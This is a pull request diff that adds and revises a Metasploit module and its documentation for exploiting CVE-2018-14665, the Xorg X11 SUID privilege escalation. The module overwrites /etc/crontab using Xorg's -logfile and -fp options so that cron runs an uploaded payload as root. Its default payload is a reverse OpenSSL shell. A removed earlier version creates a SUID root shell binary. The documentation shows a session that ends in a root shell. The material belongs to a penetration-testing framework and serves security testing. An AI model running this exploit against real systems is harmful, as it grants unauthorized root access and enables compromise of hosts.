### PR TITLE
Add module Xorg SUID privesc 

### DIFF
--- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
+++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
@@ -1,0 +1,86 @@
+## Description
+
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
+
+
+## Vulnerable Application
+
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
+
+  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.
+
+  This module has been tested successfully on:
+
+  * OpenBSD 6.3
+  * OpenBSD 6.4
+  * CentOS 7.5.1084 x86_64
+
+
+## Verification Steps
+  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. Do: `use exploit/multi/local/xorg_x11_suid_server`
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
+  5. Do: `set SESSION [SESSION]`
+  6. Do: `set LHOST [LHOST]`
+  7. Do: `run`
+  8. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+## Advanced Options
+
+  **Xdisplay**
+
+  Display to use for Xorg (default: `:1`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+```
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse double SSL handler on 172.30.0.2:4444
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[+] /etc/crontab overwrite successful
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Waiting on cron to run
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo t2XWfcWkZHevLPS8;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "t2XWfcWkZHevLPS8\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-odRjfx
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
+```

--- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
+++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
@@ -46,6 +46,11 @@
   A writable directory file system path. (default: `/tmp`)
 
 
+   **ConsoleLock**
+   
+  Will check for console lock under linux  (default: `true`)
+
+
 ## Scenarios
 
 ```

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -5,9 +5,8 @@
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
-
-  include Msf::Post::File
   include Msf::Exploit::FileDropper
+  include Msf::Post::File
   include Msf::Post::Linux::Priv
 
   def initialize(info = {})
@@ -15,19 +14,23 @@ class MetasploitModule < Msf::Exploit::Local
       'Name'           => 'Xorg X11 Server SUID privilege escalation',
       'Description'    => %q{
         This module attempts to gain root privileges with SUID Xorg X11 server
-        versions prior to 1.20.3.
+        versions 1.19.0 < 1.20.3.
 
         A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg versions 1.19.0 < 1.20.3.  This allows unprivileged users
-        that start the server the ability to elevate privileges and run
-        arbitrary code under root privileges.
+        starting Xorg.  This allows unprivileged users that start the server
+        the ability to elevate privileges and run arbitrary code under root
+        privileges.
 
         This module writes a cron job using the Xorg -logfile option. On write
         crontab.old will be created so it must be removed after exploit.  Cron
-        will then run a small script to launch a payload. It has been tested with
-        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
-        on CentOS depends on the session having console for starting Xorg
-        along with selinux settings, may work but is currently not supported.
+        will run a small script to launch a payload. It has been tested with
+        OpenBSD 6.3,6.4, and CentOS 7.  Currently CentOS requires console
+        auth. Xorg must have SUID permissions and may not start if running.
+        On successful exploitation artifacts will be created consistant with
+        starting Xorg and running a cron.  If the system is logging cron the
+        log will contain many entries for the sections in crontab not valid in
+        addition to the path of your payload.
+
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -44,26 +47,27 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
-      'Platform'       =>  %w(unix openbsd),
-      'Arch'           =>    ARCH_CMD,
-      'SessionTypes'   =>    [ 'meterpreter', 'shell' ],
+      'Platform'       =>  %w(openbsd linux),
+      'Arch'           =>    [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'SessionTypes'   =>    %w(shell meterpreter),
       'Targets'        =>
         [
            ['OpenBSD', {
             'Platform' => 'unix',
-            'Arch' => [ ARCH_CMD ] } ]
+            'Arch' => [ ARCH_CMD ] } ],
+           ['Linux x64', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X64 ] } ],
+           ['Linux x86', {
+            'Platform' => 'linux',
+            'Arch' => [ ARCH_X86 ] } ]
         ],
       'DefaultOptions' =>
         {
           'PAYLOAD' => 'cmd/unix/reverse_openssl'
         },
-
       'DefaultTarget'  => 0))
-    register_options(
-      [
-        OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
-        OptBool.new('INSHELL', [ true, 'Privesc in current shell session', true ])
-      ])
+
      register_advanced_options(
       [
          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
@@ -76,9 +80,9 @@ class MetasploitModule < Msf::Exploit::Local
   def check
 
     #suid program check
-    xorg_path = cmd_exec("which Xorg")
+    xorg_path = cmd_exec("command -v Xorg")
     unless xorg_path.include?("Xorg")
-      vprint_good "Xorg path was: #{xorg_path}"
+      vprint_error "Check for Xorg returned"
       return CheckCode::Safe
     end
     vprint_good "Xorg path found at #{xorg_path}"
@@ -90,6 +94,12 @@ class MetasploitModule < Msf::Exploit::Local
 
     #version check
     x_version = cmd_exec("Xorg -version")
+    if x_version.include? "Fatal server error:"
+      vprint_error "User probably does not have console auth"
+      vprint_error "Below returned from trying to run Xorg"
+      vprint_error x_version
+      return CheckCode::Safe
+    end
     v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
     unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
       vprint_error "Xorg version #{v} not supported"
@@ -97,69 +107,54 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "Xorg version #{v} is vulnerable"
 
-    #process check
+    #process check for /X
     proc_list = cmd_exec("ps ax")
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
       return CheckCode::Appears
-    else
-      vprint_good('Xorg does not appear running')
-      return CheckCode::Vulnerable
     end
+    vprint_good('Xorg does not appear running')
+    return CheckCode::Vulnerable
   end
 
-  def clean_on_success()
-    # will be called on session and have to drop filedropper
-    # still 
+  def on_new_session(session)
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{@clean_up}\""
+    else
+      session.shell_command(@clean_up)
     end
+    print_good "Returning session after cleaning"
+  ensure
+    super
+  end
 
   def exploit
+
     check_status = check
-    unless check_status == CheckCode::Vulnerable
-       fail_with Failure::NotVulnerable, 'Target not vulnerable'
+    if check_status == CheckCode::Appears
+      print_warning 'X detected in process list, startup may fail'
+    elsif check_status ==  CheckCode::Safe
+      fail_with Failure::NotVulnerable, 'Target not vulnerable'
     end
 
     if is_root?
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end
+    print_good 'Passed all initial checks for exploit'
 
     xdisplay = datastore['Xdisplay']
-    in_shell = datastore['INSHELL']
-    payload_path = datastore['PAYLOAD_LOC']
     pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
-    payload_c = "#{pscript}.c"
+    @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
 
-    #Making file crontab will run
-    cron_script = ''
-    if in_shell == false
-      print_status 'Uploading your payload'
-      if session.type == 'shell'
-        cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')
-        write_file(pscript,cron_script)
-        vprint_status cron_script
-      else
-        write_file(pscript, payload)
-        vprint_status 'Uploaded Meterpreter payload'
-      end
-    else
-      print_good 'Attempting privesc within current session'
-      cron_script << "cp /bin/sh #{payload_path}\n"
-      cron_script << "gcc #{payload_c} -o #{payload_path}\n"
-      cron_script << "chmod 4777 #{payload_path}\n"
-      suid_c = 'main(){setuid(0);setgid(0);system("/bin/sh");}'
-      write_file(pscript,cron_script)
-      vprint_status cron_script
-      write_file(payload_c,suid_c)
-      vprint_status suid_c
-      register_file_for_cleanup payload_c
-      register_file_for_cleanup payload_path
-    end
+    #Uploading file crontab will run
+    print_status 'Uploading your payload, this could take a while'
+    write_file(pscript,payload.encoded)
     register_file_for_cleanup pscript
     chmod pscript
 
     # Exploit steps on crontab so backing it up
     cmd_exec "cat /etc/crontab > #{pscript}.b"
-
     # Actual exploit with cron overwrite
     print_status 'Trying /etc/crontab overwrite'
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
@@ -175,26 +170,7 @@ class MetasploitModule < Msf::Exploit::Local
     12.times do
       print_status 'Waiting on cron to run'
       Rex.sleep 10
-      break if exists? payload_path
-      break unless exists? pscript      # will be cleaned up on successful exploit
-    end
-
-    #Time to become root and clean up a little
-    if in_shell == true
-      print_good 'Payload written..executing'
-      cmd_exec payload_path
-      if is_root?
-        print_good 'Your session now has root privileges'
-        print_good 'Cleaning up and restoring crontab entries'
-        cmd_exec "cat #{pscript}.b > /etc/crontab"
-        rm_f "/etc/crontab.old"
-      end
-    else
-      #<on_next_session for this?
-      print_status "This scripts' session does not have root"
-      print_warning 'You have some clean-up to do in new session'
-      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
-      print_warning 'rm -f /etc/crontab.old'
+      break if session_created?
     end
   end
 end

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -71,7 +71,8 @@ class MetasploitModule < Msf::Exploit::Local
      register_advanced_options(
       [
          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
-         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
+         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
       ]
     )
   end
@@ -83,6 +84,14 @@ class MetasploitModule < Msf::Exploit::Local
     uname = cmd_exec "uname"
     if uname =~ /linux/i
       vprint_status "Running additional check for Linux"
+      unless datastore['ConsoleLock'] == false
+        user = get_env 'USER'
+        unless exist? "/var/run/console/#{user}"
+          vprint_error "No console lock for #{user}"
+          return CheckCode::Safe
+        end
+        vprint_good "Console lock for #{user}"
+      end
       getenforce = cmd_exec "command -v getenforce"
       if getenforce.include?("getenforce")
         getenforce = cmd_exec getenforce

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local
         [
           'Narendra Shinde', # Discovery and exploit
           'Raptor - 0xdea',  # Modified exploit for cron
-          'Aaron Ringo',      # Metasploit module
+          'Aaron Ringo',     # Metasploit module
           'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
         ],
       'DisclosureDate' => 'Oct 25 2018',
@@ -48,8 +48,8 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
       'Platform'       =>  %w(openbsd linux),
-      'Arch'           =>    [ARCH_CMD, ARCH_X86, ARCH_X64],
-      'SessionTypes'   =>    %w(shell meterpreter),
+      'Arch'           =>  [ARCH_CMD, ARCH_X86, ARCH_X64],
+      'SessionTypes'   =>  %w(shell meterpreter),
       'Targets'        =>
         [
            ['OpenBSD', {

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_error x_version
       return CheckCode::Safe
     end
-    v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
+    v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
     unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
       vprint_error "Xorg version #{v} not supported"
       return CheckCode::Safe

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
     #suid program check
     xorg_path = cmd_exec("command -v Xorg")
     unless xorg_path.include?("Xorg")
-      vprint_error "Check for Xorg returned"
+      vprint_error "Could not find Xorg executable"
       return CheckCode::Safe
     end
     vprint_good "Xorg path found at #{xorg_path}"

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -17,19 +17,18 @@ class MetasploitModule < Msf::Exploit::Local
         versions 1.19.0 < 1.20.3.
 
         A permission check flaw exists for -modulepath and -logfile options when
-        starting Xorg.  This allows unprivileged users that start the server
+        starting Xorg.  This allows unprivileged users that can start the server
         the ability to elevate privileges and run arbitrary code under root
         privileges.
 
-        This module writes a cron job using the Xorg -logfile option. On write
-        crontab.old will be created so it must be removed after exploit.  Cron
-        will run a small script to launch a payload. It has been tested with
-        OpenBSD 6.3,6.4, and CentOS 7.  Currently CentOS requires console
-        auth. Xorg must have SUID permissions and may not start if running.
-        On successful exploitation artifacts will be created consistant with
-        starting Xorg and running a cron.  If the system is logging cron the
-        log will contain many entries for the sections in crontab not valid in
-        addition to the path of your payload.
+        This module has been tested with OpenBSD 6.3,6.4,and CentOS 7.
+        CentOS default install will require console auth for the users session.
+        Cron launches the payload so if Selinux is enforcing exploitation
+        may still be possible, but the module will bail.  On exploitation
+        crontab.old will be created.  The script will remove .old and restore
+        crontab after exploit.  Xorg must have SUID permissions and may not
+        start if running.  On successful exploitation artifacts will be created
+        consistant with starting Xorg and running a cron.
 
       },
       'License'        => MSF_LICENSE,
@@ -37,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Local
         [
           'Narendra Shinde', # Discovery and exploit
           'Raptor - 0xdea',  # Modified exploit for cron
-          'Aaron Ringo'      # Metasploit module
+          'Aaron Ringo',      # Metasploit module
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit module
         ],
       'DisclosureDate' => 'Oct 25 2018',
       'References'     =>
@@ -79,8 +79,25 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
 
+    #selinux check
+    uname = cmd_exec "uname"
+    if uname =~ /linux/i
+      vprint_status "Running additional check for Linux"
+      getenforce = cmd_exec "command -v getenforce"
+      if getenforce.include?("getenforce")
+        getenforce = cmd_exec getenforce
+        if getenforce.include?("Enforcing")
+          vprint_error 'Selinux is enforcing'
+          return CheckCode::Safe
+        end
+        vprint_good "Selinux returned #{getenforce} - should be ok"
+      else
+        vprint_status "Could not check Selinux, probably not on target"
+      end
+    end
+
     #suid program check
-    xorg_path = cmd_exec("command -v Xorg")
+    xorg_path = cmd_exec "command -v Xorg"
     unless xorg_path.include?("Xorg")
       vprint_error "Could not find Xorg executable"
       return CheckCode::Safe
@@ -93,22 +110,26 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_good "Xorg binary #{xorg_path} is SUID"
 
     #version check
-    x_version = cmd_exec("Xorg -version")
-    if x_version.include? "Fatal server error:"
+    x_version = cmd_exec "Xorg -version"
+    if x_version.include?("Release Date")
+      v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
+      unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
+        vprint_error "Xorg version #{v} not supported"
+        return CheckCode::Safe
+      end
+    elsif x_version.include?("Fatal server error")
       vprint_error "User probably does not have console auth"
-      vprint_error "Below returned from trying to run Xorg"
+      vprint_error "Below is Xorg -version output"
       vprint_error x_version
       return CheckCode::Safe
-    end
-    v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
-    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2'))
-      vprint_error "Xorg version #{v} not supported"
-      return CheckCode::Safe
+    else
+      vprint_warning "Could not parse Xorg -version output"
+      return CheckCode::Appears
     end
     vprint_good "Xorg version #{v} is vulnerable"
 
     #process check for /X
-    proc_list = cmd_exec("ps ax")
+    proc_list = cmd_exec "ps ax"
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
       return CheckCode::Appears
@@ -133,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     check_status = check
     if check_status == CheckCode::Appears
-      print_warning 'X detected in process list, startup may fail'
+      print_warning 'Could not get version or Xorg process possibly running, may fail'
     elsif check_status ==  CheckCode::Safe
       fail_with Failure::NotVulnerable, 'Target not vulnerable'
     end
@@ -141,11 +162,16 @@ class MetasploitModule < Msf::Exploit::Local
     if is_root?
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
     print_good 'Passed all initial checks for exploit'
 
-    xdisplay = datastore['Xdisplay']
     pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
     @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
+    xdisplay = datastore['Xdisplay']
 
     #Uploading file crontab will run
     print_status 'Uploading your payload, this could take a while'
@@ -160,9 +186,11 @@ class MetasploitModule < Msf::Exploit::Local
     cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
     Rex.sleep 5
     cmd_exec "pkill Xorg"
-    Rex.sleep 5
+    Rex.sleep 1
     cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
     unless cron_check.include? pscript
+      rm_f "#{pscript}.b"
+      print_error 'Deleting crontab backup'
       fail_with Failure::NotVulnerable, '/etc/crontab not modified'
     end
     print_good '/etc/crontab overwrite successful'

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
 
   def initialize(info = {})
     super(update_info(info,
@@ -92,17 +93,13 @@ class MetasploitModule < Msf::Exploit::Local
         end
         vprint_good "Console lock for #{user}"
       end
-      getenforce = cmd_exec "command -v getenforce"
-      if getenforce.include?("getenforce")
-        getenforce = cmd_exec getenforce
-        if getenforce.include?("Enforcing")
+      if selinux_installed?
+        if selinux_enforcing?
           vprint_error 'Selinux is enforcing'
           return CheckCode::Safe
         end
-        vprint_good "Selinux returned #{getenforce} - should be ok"
-      else
-        vprint_status "Could not check Selinux, probably not on target"
       end
+      vprint_good "Selinux is not an issue"
     end
 
     #suid program check

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Local
     # Defines path to script that will chmod the payload
     builtin_only = "#{datastore['BUILTIN']}"
     payload_path = "#{datastore['PAYLOAD_LOC']}"
-    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric rand(5..10)}"
+    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
     # Universal stub for file crontab will run

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -144,7 +144,7 @@ class MetasploitModule < Msf::Exploit::Local
     i = 0
     while i < 12
       print_status 'Waiting on cron to run'
-      sleep 10
+      Rex.sleep 10
       i += 1
       break if exists? payload_path
       break if !exists? pscript      # will be cleaned up on successful exploit

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -22,8 +22,9 @@ class MetasploitModule < Msf::Exploit::Local
         that start the server the ability to elevate privileges and run
         arbitrary code under root privileges.
 
-        This module writes a cron job using the Xorg -logfile option. The job
-        will run a small script to launch a payload. It has been tested with
+        This module writes a cron job using the Xorg -logfile option. On write
+        crontab.old will be created so it must be removed after exploit.  Cron
+        will then run a small script to launch a payload. It has been tested with
         OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
         on CentOS depends on the session having console for starting Xorg
         along with selinux settings, may work but is currently not supported.
@@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
            [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
-      'Platform'       =>  %w(linux unix openbsd),
+      'Platform'       =>  %w(unix openbsd),
       'Arch'           =>    ARCH_CMD,
       'SessionTypes'   =>    'shell',
       'Targets'        =>
@@ -60,10 +61,15 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultTarget'  => 0))
     register_options(
       [
-        OptString.new('SCRIPT', [ true, 'Dir for crontab script', '/tmp/' ]),
         OptString.new('PAYLOAD_LOC', [ true, 'SUID binary to create', '/usr/local/bin/shell' ]),
         OptBool.new('BUILTIN', [ true, 'Privesc in current session', true ])
       ])
+     register_advanced_options(
+      [
+         OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+         OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ])
+      ]
+    )
   end
 
 
@@ -71,20 +77,22 @@ class MetasploitModule < Msf::Exploit::Local
     xorg_path = cmd_exec("which Xorg")
     vprint_good 'Xorg path found at #{xorg_path}'
 
+    #<Version check here
+
     unless setuid? xorg_path
       vprint_error 'Xorg binary #{xorg_path} is not SUID'
       return CheckCode::Safe
     end
-      vprint_good 'Xorg binary #{xorg_path} is SUID'
+    vprint_good 'Xorg binary #{xorg_path} is SUID'
 
-      proc_list = []
-      proc_list = cmd_exec("ps ax")
-      if proc_list.include?('X')
-        vprint_warning('Xorg in process list. Can you stop it?')
-        return CheckCode::Safe
-      else
-        vprint_good('Xorg does not appear running')
-        return CheckCode::Detected
+    proc_list = []
+    proc_list = cmd_exec("ps ax")
+    if proc_list.include?('X')
+      vprint_warning('Xorg in process list. Can you stop it?')
+      return CheckCode::Safe
+    else
+      vprint_good('Xorg does not appear running')
+      return CheckCode::Detected
     end
   end
 
@@ -99,9 +107,10 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Defines path to script that will chmod the payload
+    xdisplay = datastore['Xdisplay']
     builtin_only = datastore['BUILTIN']
     payload_path = datastore['PAYLOAD_LOC']
-    pscript = "#{datastore['SCRIPT']}.session-#{rand_text_alphanumeric 5..10}"
+    pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
     #File crontab will run
@@ -133,21 +142,19 @@ class MetasploitModule < Msf::Exploit::Local
 
     # Actual exploit with cron overwrite
     print_status 'Trying /etc/crontab overwrite'
-    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab :1 & >/dev/null"
+    cmd_exec "cd /etc ; Xorg -fp '* * * * * root #{pscript}' -logfile crontab #{xdisplay} & >/dev/null"
     Rex.sleep 5
     cmd_exec "pkill Xorg"
     Rex.sleep 5
-    cron_check = cmd_exec "egrep #{pscript} /etc/crontab"
+    cron_check = cmd_exec "grep -F #{pscript} /etc/crontab"
     unless cron_check.include? pscript
       fail_with Failure::NotVulnerable, '/etc/crontab not modified'
     end
     print_good '/etc/crontab overwrite successful'
 
-    i = 0
-    while i < 12
+    12.times do
       print_status 'Waiting on cron to run'
       Rex.sleep 10
-      i += 1
       break if exists? payload_path
       break unless exists? pscript      # will be cleaned up on successful exploit
     end
@@ -164,9 +171,10 @@ class MetasploitModule < Msf::Exploit::Local
       end
     else
       Rex.sleep 2
+      #<on_next_session for this?
       print_status "This scripts' session does not have root"
       print_warning 'You have some clean-up to do in new session'
-      print_warning 'cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*'
+      print_warning "cat #{pscript}.b > /etc/crontab ; rm -f #{pscript}.*"
       print_warning 'rm -f /etc/crontab.old'
     end
   end

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -74,17 +74,28 @@ class MetasploitModule < Msf::Exploit::Local
 
 
   def check
+    #suid program check
     xorg_path = cmd_exec("which Xorg")
-    vprint_good 'Xorg path found at #{xorg_path}'
-
-    #<Version check here
-
-    unless setuid? xorg_path
-      vprint_error 'Xorg binary #{xorg_path} is not SUID'
+    unless xorg_path.include?("Xorg")
+      vprint_good "Xorg path was: #{xorg_path}"
       return CheckCode::Safe
     end
-    vprint_good 'Xorg binary #{xorg_path} is SUID'
+    vprint_good "Xorg path found at #{xorg_path}"
+    unless setuid? xorg_path
+      vprint_error "Xorg binary #{xorg_path} is not SUID"
+      return CheckCode::Safe
+    end
+    vprint_good "Xorg binary #{xorg_path} is SUID"
 
+    #version check
+    x_version = cmd_exec("Xorg -version")
+    v = Gem::Version.new(x_version.scan(/\d.\d+.\d/).first)
+    unless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.3'))
+      fail_with Failure::NotVulnerable, "Xorg version #{v} not supported"
+    end
+    vprint_good "Xorg version #{v} is vulnerable"
+
+    #process check
     proc_list = []
     proc_list = cmd_exec("ps ax")
     if proc_list.include?('X')
@@ -106,16 +117,14 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::BadConfig, 'This session already has root privileges'
     end
 
-    # Defines path to script that will chmod the payload
     xdisplay = datastore['Xdisplay']
     builtin_only = datastore['BUILTIN']
     payload_path = datastore['PAYLOAD_LOC']
     pscript = "#{datastore['WritableDir']}/.session-#{rand_text_alphanumeric 5..10}"
     payload_c = "#{pscript}.c"
 
-    #File crontab will run
+    #Making file crontab will run
     cron_script = ''
-    # Upload for the text payloads
     if builtin_only == false
       print_status 'Uploading your payload'
       cron_script << payload.encoded.gsub('"', '\"').gsub('$', '\$')

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -147,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Local
       Rex.sleep 10
       i += 1
       break if exists? payload_path
-      break if !exists? pscript      # will be cleaned up on successful exploit
+      break unless exists? pscript      # will be cleaned up on successful exploit
     end
 
     #Time to become root and clean up a little

--- a/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/openbsd/local/xorg_x11_suid_server.rb
@@ -1,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::Common
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Post::Linux::Priv
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Xorg X11 Server SUID privilege escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges with SUID Xorg X11 server
+        versions prior to 1.20.3.
+
+        A permission check flaw exists for -modulepath and -logfile options when
+        starting Xorg prior to 1.20.3.  This allows unprivileged users with the
+        ability to log in to the system via console to escalate their privileges
+        and run arbitrary code under root privileges (CVE-2018-14665).
+
+        This module writes a cron job using the Xorg -logfile option. The job
+        will run a small script to launch an executable. It has been tested with
+        OpenBSD 6.3,6.4 and CentOS 7.  Xorg must have SUID permissions. Success
+        on CentOS depends on the session having console for starting Xorg
+        along with selinux settings, may work but is currently not supported.
+
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Narendra Shinde', # Discovery and exploit
+          'Raptor - 0xdea',  # Modified exploit for cron
+          'Aaron Ringo'      # Metasploit module
+        ],
+
+      'DisclosureDate' => 'Oct 25 2018',
+      'Platform'       =>  %w(linux unix openbsd),
+      'Arch'           =>    ARCH_CMD,
+      'SessionTypes'   =>    'shell', #Shell is needed to start Xorg in Linux
+      'Targets'        =>
+         [
+           ['OpenBSD', {
+            'Platform' => 'unix',
+            'Arch' => [ ARCH_CMD ] } ]
+          ],
+      'DefaultOptions' =>
+         {
+             'Target'  => '0',
+             'PAYLOAD' => 'cmd/unix/reverse_openssl'
+         },
+      'References'     =>
+         [
